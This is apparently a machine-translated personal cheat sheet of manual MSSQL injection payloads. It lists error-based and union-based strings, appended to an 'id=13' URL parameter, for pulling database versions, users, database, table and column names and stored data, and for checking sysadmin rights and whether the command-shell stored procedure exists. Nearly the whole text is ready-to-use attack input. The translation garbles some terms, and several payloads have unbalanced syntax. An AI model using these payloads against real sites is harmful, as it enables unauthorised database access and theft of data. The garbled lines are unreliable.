I am used to using manual injection recently. I will list the recently used Mssql statements for convenience in the future!
Certificate -----------------------------------------------------------------------------------------------------------------------------------
Mssql annotator:
#
--
In the Error Mode:
Determine whether multiple rows are supported
; Declare @ x int --
View the current database version
URL? Id = 13 and @ version> 0 --
View currently connected database users
URL? Id = 13 and user> 0 --
View the current database name
URL? Id = 13 and db_name ()> 0 --
Database explosion name
URL? Id = 13 and 1 = convert (int, (select name from master. dbo. sysdatabases where dbid = 7 ))--
// Dbid <7 indicates the system database name.
Blow the current database table name
URL? Id = 13 and 1 = convert (int, (select top 1 name from sysobjects where xtype = U ))--
URL? Id = 13 and 1 = convert (int, (select top 1 name from sysobjects where xtype = U and name not in (table name 1, table name 2 )))--
Name of other database tables
URL? Id = 13 and 1 = convert (int, (select top 1 name from [database name] .. sysobjects where xtype = u ))--
URL? Id = 13 and 1 = convert (int, (select top 1 name from [database name] .. sysobjects where xtype = u and name not in (table name 1, table name 2 )))--
Field name
URL? Id = 13 having 1 = 1 --
URL? Id = 13 group by table name. Field name 1, field name 2 having 1 = 1 --
Field names of other tables
URL? Id = 13 select * from table name having 1 = 1 --
URL? Id = 13 select * from table name group by table name. Field name 1, field name 2 having 1 = 1 --
Data explosion
URL? Id = 13 and 1 = convert (int, (select top 1 field name from Table Name ))--
URL? Id = 13 and 1 = convert (int, (select top 1 field name from table name where field name not in (data 1, data 2 ))--
URL? Id = 13 and 1 = convert (int, (select top1 field name from table name where field name! = Data 1 and field name! = Data 2 --
// You can also use the where statement
No explicit Error Mode
URL? Id = 13 Number of order by fields
URL? Id = 13 and 1 = 2 union select ?,?,?,?,? --
Query the database version and System Version
URL? Id = 13 and 1 = 2 union select ?,?,?, @ Version --
Query database username
URL? Id = 13 and 1 = 2 union select ?,?,?, (Select user )--
URL? Id = 13 and 1 = 2 union select ?,?,?, (Select system_user )--
Query host names
URL? Id = 13 and 1 = 2 union select ?,?,?, (Select host_name ())--
Query database name
URL? Id = 13 and 1 = 2 union select ?,?,?, (Select db_name ())--
Determine the storage extension xp_mongoshell
URL? Id = 13 and 1 = 2 union select ?,?,?, (Select count (*) from master. dbo. sysobjects where xtype = X and name = xp_mongoshell )--
// 1 indicates yes, and 0 indicates no.
Judge Current Database User Permissions
URL? Id = 13 and 1 = 2 union select ?,?,?, (Select is_srvrolemember (sysadmin ))--
Query database name
URL? Id = 13 and 1 = 2 union select ?,?,? (Select name from master. dbo. sysdatabases where dbid = 7 )--
// Dbid <7 indicates the system database name.
Query database table name
URL? Id = 13 and 1 = 2 union select ?,?,? (Select top 1 name from sysobjects where xtype = U )--
URL? Id = 13 and 1 = 2 union select ?,?,? (Select top 1 name from sysobjects where xtype = U and name not in (table name 1, table name 2 ))--
Query Field Names
URL? Id = 13 and 1 = 2 union select ?,?,? (Select top 1 name from database name. dbo. syscolumns where id = object_id (Table name )--
URL? Id = 13 and 1 = 2 union select ?,?,? (Select top 1 name from database name. dbo. syscolumns where id = object_id (table name) and name not in (field name 1, field name 2 )--
Query data
URL? Id = 13 and 1 = 2 union select ?,?,? (Select top 1 field name from Table Name )--
URL? Id = 13 and 1 = 2 union select ?,?,? (Select top 1 field name from table name where field name not in (data 1, data 2 )--
Other statements
Explosive table name
URL? Id = 13 URL? Id = 13 and 1 = 2 union select ?,?,? (Select top 1 name from sysobjects where xtype = u and name not in (select top 0 name from sysobjects where xtype = u) from sysobjects --
// Query the table name (add the second top N number from 0 to traverse the current database table name.
Name of other database tables
URL? Id = 13 URL? Id = 13 and 1 = 2 union select ?,?,? (Select top 1 name from [database name] .. sysobjects where xtype = u and name not in (select top 0 name from [database name] .. sysobjects where xtype = u)
Field explosion
URL? Id = 13 and 1 = 2 union select ?,?,? (Select top 1 name from syscolumns where id in (select id from sysobjects where name = table name) and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name = table name) from sysobjects --
// Add the second top N number from 0 to traverse the field names of the admin table.
Query data
URL? Id = 13 URL? Id = 13 and 1 = 2 union select top 1 ?,?, Field name from table name where name not in (select top 0 name from Table name )--
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
